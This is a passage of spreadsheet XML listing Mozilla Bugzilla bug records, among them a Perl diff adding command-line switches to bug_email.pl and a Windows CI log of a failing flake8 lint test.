          <t>P2</t>
        </is>
      </c>
      <c r="R4232" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4232" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4232" t="n">
        <v>1</v>
      </c>
      <c r="U4232" t="n">
        <v>0</v>
      </c>
      <c r="V4232" t="n">
        <v>5</v>
      </c>
      <c r="W4232" t="inlineStr">
        <is>
          <t>The maybe_reconfig.sh script is sometimes hanging on naked hg operations. 
We should use the hgtool wrapper instead so we can take advantage of the built-in timeouts and retries.</t>
        </is>
      </c>
      <c r="X4232" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4233">
      <c r="A4233" t="n">
        <v>587179</v>
      </c>
      <c r="B4233" t="inlineStr">
        <is>
          <t>2010-08-13 14:55:21 -0700</t>
        </is>
      </c>
      <c r="C4233" t="inlineStr">
        <is>
          <t>Add SHOWFOR for Firefox 4.0 beta</t>
        </is>
      </c>
      <c r="D4233" t="inlineStr">
        <is>
          <t>2010-08-30 13:00:31 -0700</t>
        </is>
      </c>
      <c r="E4233" t="n">
        <v>1</v>
      </c>
      <c r="F4233" t="n">
        <v>1</v>
      </c>
      <c r="G4233" t="n">
        <v>5</v>
      </c>
      <c r="H4233" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4233" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4233" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4233" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4233" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4233" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4233" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4233" t="inlineStr"/>
      <c r="Q4233" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4233" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4233" t="inlineStr">
        <is>
          <t>2.2.4</t>
        </is>
      </c>
      <c r="T4233" t="n">
        <v>1</v>
      </c>
      <c r="U4233" t="n">
        <v>0</v>
      </c>
      <c r="V4233" t="n">
        <v>10</v>
      </c>
      <c r="W4233" t="inlineStr">
        <is>
          <t>Add SHOWFOR for Firefox 4.0 beta (tiki)</t>
        </is>
      </c>
      <c r="X4233" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4234">
      <c r="A4234" t="n">
        <v>36379</v>
      </c>
      <c r="B4234" t="inlineStr">
        <is>
          <t>2000-04-19 11:37:05 -0700</t>
        </is>
      </c>
      <c r="C4234" t="inlineStr">
        <is>
          <t>bug_email.pl fixed to enable default component &amp; product via command-line</t>
        </is>
      </c>
      <c r="D4234" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E4234" t="n">
        <v>1</v>
      </c>
      <c r="F4234" t="n">
        <v>1</v>
      </c>
      <c r="G4234" t="n">
        <v>4</v>
      </c>
      <c r="H4234" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4234" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4234" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4234" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4234" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4234" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4234" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4234" t="inlineStr">
        <is>
          <t>bug_email</t>
        </is>
      </c>
      <c r="Q4234" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4234" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4234" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4234" t="n">
        <v>1</v>
      </c>
      <c r="U4234" t="n">
        <v>1</v>
      </c>
      <c r="V4234" t="n">
        <v>11</v>
      </c>
      <c r="W4234" t="inlineStr">
        <is>
          <t>We're using bugzilla as both a bug-tracking and system administration
trouble-ticket tracking system.  The below diff allows default product and
component to be set via command-line switches.
The switches are:
-p='PRODUCT'
-c='COMPONENT'
  This comes in really handy if you specify different procmailrc files based
upon which email address things are sent to.  We have various queues for network
operations issues, development, QA, etc.  Hope this makes it into release!
724,731d712
&lt;     if ( /-p=['"]?(.+)['"]?/ )
&lt;     {
&lt;       $DEFAULT_PRODUCT = $1;
&lt;     }
&lt;     if ( /-c=['"]?(.+)["']?/ )
&lt;     {
&lt;       $DEFAULT_COMPONENT = $1;
&lt;     }</t>
        </is>
      </c>
      <c r="X4234" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4235">
      <c r="A4235" t="n">
        <v>888137</v>
      </c>
      <c r="B4235" t="inlineStr">
        <is>
          <t>2013-06-27 20:01:07 -0700</t>
        </is>
      </c>
      <c r="C4235" t="inlineStr">
        <is>
          <t>Update keyboard visuals to improve performance for v1-train</t>
        </is>
      </c>
      <c r="D4235" t="inlineStr">
        <is>
          <t>2013-08-08 16:21:07 -0700</t>
        </is>
      </c>
      <c r="E4235" t="n">
        <v>1</v>
      </c>
      <c r="F4235" t="n">
        <v>1</v>
      </c>
      <c r="G4235" t="n">
        <v>6</v>
      </c>
      <c r="H4235" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4235" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4235" t="inlineStr">
        <is>
          <t>Gaia::Keyboard</t>
        </is>
      </c>
      <c r="K4235" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4235" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4235" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4235" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4235" t="inlineStr">
        <is>
          <t>[c= u=1.1]</t>
        </is>
      </c>
      <c r="Q4235" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4235" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4235" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4235" t="n">
        <v>1</v>
      </c>
      <c r="U4235" t="n">
        <v>0</v>
      </c>
      <c r="V4235" t="n">
        <v>7</v>
      </c>
      <c r="W4235" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #860318 +++
To uplift the style changes part of Bug #860318 to v1-train.
For the sake of bug #835404, update keyboard visual design to a more minimalist visual design, less reliant on complex borders, gradients, background images, etc.
--
Nominate this as leo+, per the suggestion on  Bug #860318 Comment 54
We could get performance gain from this style change, see Bug #860318 Comment 1, Comment 2 for details.</t>
        </is>
      </c>
      <c r="X4235" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4236">
      <c r="A4236" t="n">
        <v>1654937</v>
      </c>
      <c r="B4236" t="inlineStr">
        <is>
          <t>2020-07-23 16:03:24 -0700</t>
        </is>
      </c>
      <c r="C4236" t="inlineStr">
        <is>
          <t>Perma Windows10 mozlinz tools/lint/test/test_flake8.py::test_lint_excluded_file[flake8] TEST-UNEXPECTED-FAIL</t>
        </is>
      </c>
      <c r="D4236" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E4236" t="n">
        <v>1</v>
      </c>
      <c r="F4236" t="n">
        <v>1</v>
      </c>
      <c r="G4236" t="n">
        <v>7</v>
      </c>
      <c r="H4236" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4236" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J4236" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K4236" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4236" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4236" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4236" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4236" t="inlineStr"/>
      <c r="Q4236" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4236" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4236" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T4236" t="n">
        <v>1</v>
      </c>
      <c r="U4236" t="n">
        <v>0</v>
      </c>
      <c r="V4236" t="n">
        <v>15</v>
      </c>
      <c r="W4236" t="inlineStr">
        <is>
          <t>**Filed by:** malexandru [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=310867881&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/K4sRosN7T8SP8V7NSm99MQ/runs/0/artifacts/public/logs/live_backing.log
---
```
[task 2020-07-23T17:19:29.195Z]  1:10.25 tools/lint/test/test_black.py::test_lint_black[black] PASSED
[task 2020-07-23T17:19:29.195Z]  1:10.25 
[task 2020-07-23T17:19:29.195Z]  1:10.25 ========================== 1 passed in 8.27 seconds ===========================
[task 2020-07-23T17:19:29.497Z] ERROR: jsonschema 3.2.0 requires pyrsistent&gt;=0.14.0, which is not installed.
[task 2020-07-23T17:19:29.497Z] ERROR: jsonschema 3.2.0 requires six&gt;=1.11.0, which is not installed.
[task 2020-07-23T17:19:30.909Z]  1:11.97 Z:\task_1595523575\build\src\tools\lint\test\test_lintpref.py
[task 2020-07-23T17:19:30.909Z]  1:11.97 ============================= test session starts =============================
[task 2020-07-23T17:19:30.910Z]  1:11.97 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:30.910Z]  1:11.97 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:30.910Z]  1:11.97 collecting ... collected 1 item
[task 2020-07-23T17:19:30.911Z]  1:11.97 
[task 2020-07-23T17:19:30.911Z]  1:11.97 tools/lint/test/test_lintpref.py::test_lintpref[lintpref] PASSED
[task 2020-07-23T17:19:30.911Z]  1:11.97 
[task 2020-07-23T17:19:30.911Z]  1:11.97 ========================== 1 passed in 3.22 seconds ===========================
[task 2020-07-23T17:19:31.757Z]  1:12.82 Z:\task_1595523575\build\src\tools\lint\test\test_shellcheck.py
[task 2020-07-23T17:19:31.757Z]  1:12.82 ============================= test session starts =============================
[task 2020-07-23T17:19:31.758Z]  1:12.82 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:31.758Z]  1:12.82 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:31.758Z]  1:12.82 collecting ... collected 1 item
[task 2020-07-23T17:19:31.758Z]  1:12.82 
[task 2020-07-23T17:19:31.758Z]  1:12.82 tools/lint/test/test_shellcheck.py::test_basic[shellcheck] SKIPPED
[task 2020-07-23T17:19:31.758Z]  1:12.82 =========================== short test summary info ===========================
[task 2020-07-23T17:19:31.758Z]  1:12.82 SKIP [1] tools\lint\test\test_shellcheck.py:11: shellcheck is not installed
[task 2020-07-23T17:19:31.758Z]  1:12.82 
[task 2020-07-23T17:19:31.759Z]  1:12.82 ========================== 1 skipped in 0.09 seconds ==========================
[task 2020-07-23T17:19:36.871Z]  1:17.93 Z:\task_1595523575\build\src\tools\lint\test\test_yaml.py
[task 2020-07-23T17:19:36.871Z]  1:17.93 ============================= test session starts =============================
[task 2020-07-23T17:19:36.871Z]  1:17.93 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:36.871Z]  1:17.93 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:36.871Z]  1:17.93 collecting ... collected 1 item
[task 2020-07-23T17:19:36.871Z]  1:17.93 
[task 2020-07-23T17:19:36.872Z]  1:17.93 tools/lint/test/test_yaml.py::test_basic[yamllint] PASSED
[task 2020-07-23T17:19:36.872Z]  1:17.93 
[task 2020-07-23T17:19:36.872Z]  1:17.93 ========================== 1 passed in 3.70 seconds ===========================
[task 2020-07-23T17:19:37.098Z]  1:18.16 Z:\task_1595523575\build\src\python\mozlint\test\test_result.py
[task 2020-07-23T17:19:37.098Z]  1:18.16 ============================= test session starts =============================
[task 2020-07-23T17:19:37.098Z]  1:18.16 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:37.098Z]  1:18.16 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:37.098Z]  1:18.16 collecting ... collected 1 item
[task 2020-07-23T17:19:37.098Z]  1:18.16 
[task 2020-07-23T17:19:37.099Z]  1:18.16 python/mozlint/test/test_result.py::test_issue_defaults PASSED
[task 2020-07-23T17:19:37.099Z]  1:18.16 
[task 2020-07-23T17:19:37.099Z]  1:18.16 ========================== 1 passed in 0.04 seconds ===========================
[task 2020-07-23T17:19:37.110Z]  1:18.17 Z:\task_1595523575\build\src\python\mozlint\test\test_roller.py
[task 2020-07-23T17:19:37.110Z]  1:18.17 ============================= test session starts =============================
[task 2020-07-23T17:19:37.110Z]  1:18.17 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:37.110Z]  1:18.17 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:37.111Z]  1:18.17 collecting ... collected 27 items
[task 2020-07-23T17:19:37.111Z]  1:18.17 
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_no_linters_configured PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_successful PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_from_subdir PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_catch_exception PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_with_global_excluded_path PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_with_local_excluded_path PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_with_no_files_to_lint PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_with_invalid_extension PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_with_failure_code PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_roll_warnings PASSED
[task 2020-07-23T17:19:37.111Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs[1] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs[4] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs[8] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs[16] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_max_paths_per_job[1-12] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_max_paths_per_job[4-6] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_max_paths_per_job[16-6] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs_global[1] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs_global[4] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs_global[8] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_number_of_jobs_global[16] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_max_paths_per_job_global[1] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_max_paths_per_job_global[4] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_max_paths_per_job_global[16] SKIPPED
[task 2020-07-23T17:19:37.112Z]  1:18.17 python/mozlint/test/test_roller.py::test_keyboard_interrupt SKIPPED
[task 2020-07-23T17:19:37.113Z]  1:18.17 python/mozlint/test/test_roller.py::test_support_files PASSED
[task 2020-07-23T17:19:37.113Z]  1:18.17 python/mozlint/test/test_roller.py::test_setup PASSED
[task 2020-07-23T17:19:37.113Z]  1:18.17 =========================== short test summary info ===========================
[task 2020-07-23T17:19:37.113Z]  1:18.17 SKIP [4] python\mozlint\test\test_roller.py:160: monkeypatch issues with multiprocessing on Windows
[task 2020-07-23T17:19:37.113Z]  1:18.17 SKIP [3] python\mozlint\test\test_roller.py:176: monkeypatch issues with multiprocessing on Windows
[task 2020-07-23T17:19:37.113Z]  1:18.17 SKIP [4] python\mozlint\test\test_roller.py:194: monkeypatch issues with multiprocessing on Windows
[task 2020-07-23T17:19:37.113Z]  1:18.17 SKIP [3] python\mozlint\test\test_roller.py:207: monkeypatch issues with multiprocessing on Windows
[task 2020-07-23T17:19:37.113Z]  1:18.17 SKIP [1] python\mozlint\test\test_roller.py:225: signal.CTRL_C_EVENT isn't causing a KeyboardInterrupt on Windows
[task 2020-07-23T17:19:37.113Z]  1:18.17 
[task 2020-07-23T17:19:37.114Z]  1:18.17 =================== 12 passed, 15 skipped in 23.86 seconds ====================
[task 2020-07-23T17:19:39.090Z]  1:20.15 Z:\task_1595523575\build\src\tools\lint\test\test_rst.py
[task 2020-07-23T17:19:39.090Z]  1:20.15 ============================= test session starts =============================
[task 2020-07-23T17:19:39.090Z]  1:20.15 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:39.090Z]  1:20.15 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:39.090Z]  1:20.15 collecting ... collected 1 item
[task 2020-07-23T17:19:39.090Z]  1:20.15 
[task 2020-07-23T17:19:39.090Z]  1:20.15 tools/lint/test/test_rst.py::test_basic[rst] PASSED
[task 2020-07-23T17:19:39.090Z]  1:20.15 
[task 2020-07-23T17:19:39.090Z]  1:20.15 ========================== 1 passed in 4.22 seconds ===========================
[task 2020-07-23T17:19:39.474Z]  1:20.53 Z:\task_1595523575\build\src\python\mozlint\test\test_types.py
[task 2020-07-23T17:19:39.474Z]  1:20.53 ============================= test session starts =============================
[task 2020-07-23T17:19:39.474Z]  1:20.53 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:39.474Z]  1:20.53 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:39.474Z]  1:20.53 collecting ... collected 12 items
[task 2020-07-23T17:19:39.475Z]  1:20.53 
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_types[external.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_types[global.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_types[regex.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_types[string.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_types[structured.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_missing_files[external.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_missing_files[global.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_missing_files[regex.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_missing_files[string.yml] PASSED
[task 2020-07-23T17:19:39.475Z]  1:20.53 python/mozlint/test/test_types.py::test_linter_missing_files[structured.yml] PASSED
[task 2020-07-23T17:19:39.476Z]  1:20.53 python/mozlint/test/test_types.py::test_no_filter PASSED
[task 2020-07-23T17:19:39.476Z]  1:20.53 python/mozlint/test/test_types.py::test_global_skipped PASSED
[task 2020-07-23T17:19:39.476Z]  1:20.53 
[task 2020-07-23T17:19:39.476Z]  1:20.54 ========================= 12 passed in 26.22 seconds ==========================
[task 2020-07-23T17:19:51.160Z]  1:32.22 Z:\task_1595523575\build\src\tools\lint\test\test_flake8.py
[task 2020-07-23T17:19:51.160Z]  1:32.22 ============================= test session starts =============================
[task 2020-07-23T17:19:51.160Z]  1:32.22 platform win32 -- Python 3.6.5, pytest-3.6.2, py-1.5.4, pluggy-0.6.0 -- Z:\task_1595523575\build\src\obj-x86_64-pc-mingw32\_virtualenvs\src-dXRY18kn-3\Scripts\python.exe
[task 2020-07-23T17:19:51.160Z]  1:32.22 rootdir: Z:\task_1595523575\build\src, inifile: Z:\task_1595523575\build\src\config\mozunit\mozunit\pytest.ini
[task 2020-07-23T17:19:51.160Z]  1:32.22 collecting ... collected 8 items
[task 2020-07-23T17:19:51.161Z]  1:32.22 
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_single_file[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_custom_config_ignored[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_fix[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_fix_uses_config[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_excluded_file[flake8] TEST-UNEXPECTED-FAIL
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_excluded_file_with_glob[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_excluded_file_with_no_filter[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 tools/lint/test/test_flake8.py::test_lint_uses_custom_extensions[flake8] PASSED
[task 2020-07-23T17:19:51.161Z]  1:32.22 
[task 2020-07-23T17:19:51.162Z]  1:32.22 ================================== FAILURES ===================================
[task 2020-07-23T17:19:51.162Z]  1:32.22 _______________________ test_lint_excluded_file[flake8] _______________________
[task 2020-07-23T17:19:51.162Z]  1:32.22 
[task 2020-07-23T17:19:51.162Z]  1:32.22 lint = &lt;function lint.&lt;locals&gt;.wrapper at 0x000001FE66E2B9D8&gt;
[task 2020-07-23T17:19:51.162Z]  1:32.22 paths = &lt;function paths.&lt;locals&gt;._inner at 0x000001FE66BE1EA0&gt;
[task 2020-07-23T17:19:51.162Z]  1:32.22 config = {'description': 'Python linter', 'exclude': ['Z:/task_1595523575/build/src/tools/lint/test/files/flake8/bad.py', 'Z:\\...ld\\src\\tools\\lint\\test\\files\\flake8\\subdir\\exclude'], 'extensions': ['configure', 'py'], 'include': ['.'], ...}
[task 2020-07-23T17:19:51.162Z]  1:32.22 
[task 2020-07-23T17:19:51.162Z]  1:32.22     def test_lint_excluded_file(lint, paths, config):
[task 2020-07-23T17:19:51.162Z]  1:32.22         # First file is globally excluded, second one is from .flake8 config.
[task 2020-07-23T17:19:51.162Z]  1:32.22         files = paths("bad.py", "subdir/exclude/bad.py", "subdir/exclude/exclude_subdir")
[task 2020-07-23T17:19:51.162Z]  1:32.22         config["exclude"] = paths("bad.py")
[task 2020-07-23T17:19:51.162Z]  1:32.22         results = lint(files, config)
[task 2020-07-23T17:19:51.162Z]  1:32.22         print(results)
[task 2020-07-23T17:19:51.162Z]  1:32.22 &gt;       assert len(results) == 0
[task 2020-07-23T17:19:51.163Z]  1:32.22 E       AssertionError: assert 2 == 0
[task 2020-07-23T17:19:51.163Z]  1:32.22 E        +  where 2 = len([Issue(linter='flake8', path='Z:/task_1595523575/build/src/tools/lint/test/files/flake8/subdir/exclude/exclude_subdir/..., source=None, level='error', rule='E501', lineoffset=None, diff=None, relpath='subdir/exclude/exclude_subdir/bad.py')])
[task 2020-07-23T17:19:51.163Z]  1:32.22 
[task 2020-07-23T17:19:51.163Z]  1:32.22 tools\lint\test\test_flake8.py:72: AssertionError
[task 2020-07-23T17:19:51.163Z]  1:32.22 ---------------------------- Captured stdout call -----------------------------
[task 2020-07-23T17:19:51.163Z]  1:32.22 [Issue(linter='flake8', path='Z:/task_1595523575/build/src/tools/lint/test/files/flake8/subdir/exclude/exclude_subdir/bad.py', lineno=2, column=1, message="'distutils' imported but unused", hint=None, source=None, level='error', rule='F401', lineoffset=None, diff=None, relpath='subdir/exclude/exclude_subdir/bad.py'), Issue(linter='flake8', path='Z:/task_1595523575/build/src/tools/lint/test/files/flake8/subdir/exclude/exclude_subdir/bad.py', lineno=5, column=101, message='line too long (111 &gt; 100 characters)', hint=None, source=None, level='error', rule='E501', lineoffset=None, diff=None, relpath='subdir/exclude/exclude_subdir/bad.py')]
[task 2020-07-23T17:19:51.163Z]  1:32.22 ---------------------------- Captured stderr call -----------------------------
[task 2020-07-23T17:19:51.163Z]  1:32.22 17:19:45.434 flake8 (5492) | flake8 version=3.8.3
[task 2020-07-23T17:19:51.163Z]  1:32.22 17:19:45.435 flake8 (5492) | Command: --config Z:/task_1595523575/build/src/tools/lint/test/files/flake8\.flake8 --output-file C:\Users\task_1595523575\AppData\Local\Temp\tmpeuf29p1n --format {"path":"%(path)s","lineno":%(row)s,"column":%(col)s,"rule":"%(code)s","message":"%(text)s"} --filename *.configure,*.py
[task 2020-07-23T17:19:51.163Z]  1:32.22 ------------------------------ Captured log call ------------------------------
[task 2020-07-23T17:19:51.163Z]  1:32.22 flake8.py                  104 DEBUG    flake8 version=3.8.3
[task 2020-07-23T17:19:51.163Z]  1:32.22 flake8.py                  118 DEBUG    Command: --config Z:/task_1595523575/build/src/tools/lint/test/files/flake8\.flake8 --output-file C:\Users\task_1595523575\AppData\Local\Temp\tmpeuf29p1n --format {"path":"%(path)s","lineno":%(row)s,"column":%(col)s,"rule":"%(code)s","message":"%(text)s"} --filename *.configure,*.py
[task 2020-07-23T17:19:51.163Z]  1:32.22 manager.py                 211 WARNING  option --max-complexity: please update from optparse string `type=` to argparse callable `type=` -- this will be an error in the future
[task 2020-07-23T17:19:51.163Z]  1:32.22 application.py             208 WARNING  "{"path":"%(path)s","lineno":%(row)s,"column":%(col)s,"rule":"%(code)s","message":"%(text)s"}" is an unknown formatter. Falling back to default.
[task 2020-07-23T17:19:51.163Z]  1:32.22 checker.py                 120 WARNING  The multiprocessing module is not available. Ignoring --jobs arguments.
[task 2020-07-23T17:19:51.163Z]  1:32.22 ===================== 1 failed, 7 passed in 17.01 seconds =====================
[task 2020-07-23T17:19:51.163Z]  1:32.22 Setting retcode to 1 from Z:\task_1595523575\build\src\tools\lint\test\test_flake8.py
[task 2020-07-23T17:19:54.089Z]  1:35.15 Z:\task_1595523575\build\src\tools\lint\test\test_eslint.py
